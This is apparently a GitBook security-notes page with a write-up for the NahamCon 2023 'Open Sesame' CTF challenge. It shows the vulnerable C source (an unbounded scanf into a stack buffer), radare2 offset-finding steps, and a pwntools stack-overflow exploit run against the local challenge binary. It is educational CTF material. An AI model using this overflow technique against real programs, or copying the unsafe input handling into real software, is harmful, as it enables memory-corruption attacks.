Knowledge Bank
  • 🔭About Us
    • 👋Welcome to Securescape!
  • 👶Fundamentals
    • 🖥️Operating Systems (WIP)
      • Introduction to Operating Systems
      • Processes and Process Management
        • 📠Processes
        • 🧵Threads
        • 📅Scheduling
      • Memory Management
        • Virtual Memory Management
      • Storage Management
      • I/O Management
    • 🐧Linux (WIP)
      • Introduction to Linux
      • Linux System Management
    • ⚡Programming (WIP)
      • 🔗Assembly
      • 💪C(++/#)
      • 🐍Python
      • 👑Nim
      • 🔨Bash
        • Introduction to Bash Scripting
        • Variables, Loops, and Port Scanner
    • 🚩Networking (WIP)
      • 📶Networking 101
        • 🕸️Networking Basics
        • 🛑Protocols
        • 🧓IPv4
        • 🧒IPv6
      • 🪡Packet Tracer
        • Interface
        • Connections
        • Creating Networks
        • Virtual LANS & Trunks
      • 🕸️Subnetting
      • 🕵️Network Security
    • ✍️Report Writing (WIP)
      • 🔍Research Skills
      • 🏗️Structuring a Report
      • 🗃️Creating Templates
  • 🦂General Security
    • 🗒️Methodologies
      • 🇭🇰OSSTMM
      • 🐝OWASP
        • Web Security Testing Guide
        • Mobile Security Testing Guide
      • 🦅NIST
      • 🥢PTES
      • ⛓️Cyber Killchain
    • 🍔Binary Exploitation
      • ir0nstone's Binary Exploitation Notes
    • 🎩Cheat Sheets
      • Enumeration
        • Network Scan
        • Vulnerability Scan
        • Web Scan
      • Exploitation
        • Page 1
        • Payloads & Shells
      • Post Exploitation
        • Lay of The Land
        • Persistence
        • Data Exfiltration
        • Pivoting
      • Command & Control
      • Disassembly
        • ☢️Radare2
        • 🥜GDB
      • CEH Cheatsheet
  • ⚔️Offensive Security
    • 💡Hardware Exploitation
      • Intro to Hardware
    • 🥷Red Team
      • 🦠Malware Development
        • Crow Malware Development
        • 🪡C# Malware
      • 🏭Offensive Development
        • 🔧Offensive DevOps
          • 🏷️GitLab
            • GitLab Setup
            • Simple Calculator Project
            • Making our CI/CD Pipeline
            • Build Artifacts
          • 🌆TeamCity
            • TeamCity Setup
            • Creating TeamCity Projects
            • Obfuscating Payloads
          • 🍷Jenkins (WIP)
            • Jenkins Setup
            • Creating Pipelines
            • Managing Projects
            • API Interaction
        • 🏗️Infrastructure Development (WIP)
          • 🎮Command & Control Infrastructure
            • 🤖Command & Control Anatomy
              • Command & Control Frameworks
              • Ⓜ️Metasploit Framework
                • Installing Metasploit
                • Metasploit Basics
                • Advanced Features
                • Metasploit Documentation
              • 🐲Mythic Framework
                • Installing Mythic
                • Malleable Command & Control
                • All About Agents
                • Services
                • Mythic Documentation
            • 🚥Traffic Redirection
              • Nginx
              • Amazon Web Services
              • Microsoft Azure
              • Google Cloud Platform
              • Cloudflare Workers
            • 🥷Covert Infrastructure
              • Ensuring Resiliency
              • Traffic Masking
              • Network Rules
          • 🎣Phishing Infrastructure
            • 📧Email Anatomy
            • 🐟Phishing Infrastructure Setup
            • 🚚Payload Delivery
            • 🚩Removing Red Flags
          • 🪄Infrastructure as Code
            • 🏝️Terraform
              • Interacting with Docker
              • Going to the Cloud
              • Hybrid Deployment
            • 🧊Pulumi
            • 🎼Ansible
          • ⚙️Infrastructure Automation
            • 🦴Structuring our Project
            • 🏭Automating Server Setups
            • 🎼Orchestrating our Infrastructure
            • 🔧CI/CD Integration
      • 🏙️Active Directory (WIP)
        • Active Directory Overview
        • Authentication
        • AD Lab
      • Red Team Operations - Joas Santos
  • 🛡️Defensive Security
  • 📻Software Defined Radios
    • ⚠️Disclaimer
    • 📡Baofeng
      • Programming
  • 🧑‍🔬Home Lab
    • 💨Virtualisation
      • 🔸Proxmox
  • 🏁Capture The Flag
    • 🧊HackTheBox
      • 👾Cyber Apocalypse
        • Cyber Apocalypse 2023
    • 🐤TryHackMe
      • 🎄Advent of Code
      • 🚪Rooms
        • 🐥Basic Pentesting
        • 👨‍💻Blog
      • 👟Paths
    • 🏳️Competitions
      • Nahamcon
        • Nahamcon 2023
          • Binary Exploitation
            • Open Sesame
      • 👁️Iris CTF
  • 🦺DRAFTS
    • GS
      • 📱Mobile Application Security
      • 👨‍🔬Reverse Engineering
      • 🌐Web Application Security
      • 📌Information Security
      • 🔒Cryptography
      • 🤫Operational Security
    • DS
      • 🧠Threat Intelligence
        • 🦌ELK Stack
          • 🤸Elasticsearch
          • 🏕️Kibana
          • 🦤SELKS
        • 🚓Yara
      • 🏹Threat Hunting
      • 🧬Malware Analysis
        • Fundamentals
      • 🔬Forensics
        • 📶Network Forensics
          • 🦈Wireshark
          • 🥟TCP Dump
        • 💾Memory Forensics
          • ⚡Volatility
        • 💽Disk Forensics
          • 🐕Autopsy
        • 🪟Windows Forensics
        • 🐧Linux Forensics
      • 🌲Security Operations
        • Intrusion Detection & Prevention
          • 🐛Splunk
            • Splunk Basics
            • Integrating Suricata with Splunk
          • 🐗Suricata
            • Intro to Suricata
          • 🐽Snort
            • Snort Basics
        • Security Information and Event Management (SIEM)
        • Security Orchestration, Automation and Response (SOAR)
    • HL
      • 🖥️Hardware
    • OS
      • 📶Network Exploitation
      • 🌩️Cloud Exploitation
Powered by GitBook
On this page

Was this helpful?

Edit on GitHub
  1. Capture The Flag
  2. Competitions
  3. Nahamcon
  4. Nahamcon 2023
  5. Binary Exploitation

Open Sesame

#define SECRET_PASS "OpenSesame!!!"

Bool isPasswordCorrect(char *input)
{
    return (strncmp(input, SECRET_PASS, strlen(SECRET_PASS)) == 0) ? yes : no;
}

void caveOfGold()
{
    Bool caveCanOpen = no;
    char inputPass[256];

    puts("BEHOLD THE CAVE OF GOLD\n");

    puts("What is the magic enchantment that opens the mouth of the cave?");
    flushBuffers();

    scanf("%s", inputPass);

# The binary is vulnerable to a Stack-Based Buffer Overflow attack - it is a x64 bit ELF executable with NX enabled.
i~nx,pie,endian,rel
endian   little
nx       true
relocs   true
relro    partial
# We can generate a cyclic pattern with ragg2 -P 300 -r to cause a segment error

dc
BEHOLD THE CAVE OF GOLD

What is the magic enchantment that opens the mouth of the cave?
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABYABZABaABbABcABdABeABfABgABhABiABjABkABlABmAB
ERROR, INCORRECT PASSWORD!
[+] SIGNAL 11 errno=0 addr=0x00000000 code=128 si_pid=0 ret=0

# If we run wopO `dr rbp` we can find the offset to the base pointer
> wopO `dr rbp`
272
# We know that OpenSesame!!! is the password so we can subtract the length of it by the offset of the RBP to get 259 - that means we need 259 bits of padding AFTER supplying the password -> ('OpenSesame!!!'+b"A"*259)

# Next, we need to get the offset of the stack pointer using wopO
> pxw @ rsp
0x7fffffffde08  0x41684241 0x42416942 0x6b42416a 0x416c4241  ABhABiABjABkABlA
[...]
> wopO 0x41684241
280
# So we need 8 more characters added after our padding
('OpenSesame!!!'+b"A"*259+b"B"*8)

# Let's make our exploit script
#!/usr/bin/env python3
# print("OpenSesame!!!" + "A"*259 + "B"*8)

from pwn import *

payload = b"OpenSesame!!!"
payload += b"A"*259
payload += b"B"*8

p = process("./open_sesame")

p.clean()
p.sendline(payload)
log.info(p.clean())
python3 exploit.py
[+] Starting local process './open_sesame': pid 10635
/home/lavender/.local/lib/python3.11/site-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] YOU HAVE PROVEN YOURSELF WORTHY HERE IS THE GOLD:
[*] Stopped process './open_sesame' (pid 10635)

# You can make a flag file to test this
PreviousBinary ExploitationNextIris CTF

Last updated 1 year ago

Was this helpful?

🏁
🏳️